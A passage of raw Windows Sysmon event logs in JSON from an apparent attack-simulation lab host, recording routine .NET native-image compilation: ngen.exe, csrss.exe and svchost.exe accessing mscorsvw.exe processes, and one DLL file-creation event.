08:05:12.320","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222A-5F25-0000-0010B0020B00}","TargetProcessId":"1180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7046,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:12.320\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222A-5F25-0000-0010B0020B00}\r\nTargetProcessId: 1180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:12.320","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222A-5F25-0000-0010B0020B00}","TargetProcessId":"1180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7047,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:12.335\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2238-5F25-0000-0010C9BB0B00}\r\nTargetProcessId: 1180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:12.335","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2238-5F25-0000-0010C9BB0B00}","TargetProcessId":"1180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7048,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:13.585\r\nProcessGuid: {41C8662E-2238-5F25-0000-0010C9BB0B00}\r\nProcessId: 1180\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\49c-0\\Microsoft.Build.Engine.dll\r\nCreationUtcTime: 2020-08-01 08:05:13.585","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:13.585","ProcessGuid":"{41C8662E-2238-5F25-0000-0010C9BB0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\49c-0\\Microsoft.Build.Engine.dll","CreationUtcTime":"2020-08-01 08:05:13.585","EventReceivedTime":"2020-08-01 08:05:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7049,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:13.648\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2239-5F25-0000-00103DC00B00}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:13.648","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2239-5F25-0000-00103DC00B00}","TargetProcessId":"3252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7050,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:13.648\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2239-5F25-0000-00103DC00B00}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:13.648","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2239-5F25-0000-00103DC00B00}","TargetProcessId":"3252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7051,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:13.648\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2239-5F25-0000-00103DC00B00}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:13.648","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2239-5F25-0000-00103DC00B00}","TargetProcessId":"3252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7052,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:13.695\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2239-5F25-0000-001072C30B00}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:13.695","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2239-5F25-0000-001072C30B00}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7053,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:13.695\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2239-5F25-0000-001072C30B00}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:13.695","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2239-5F25-0000-001072C30B00}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7054,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:13.695\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2239-5F25-0000-001072C30B00}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 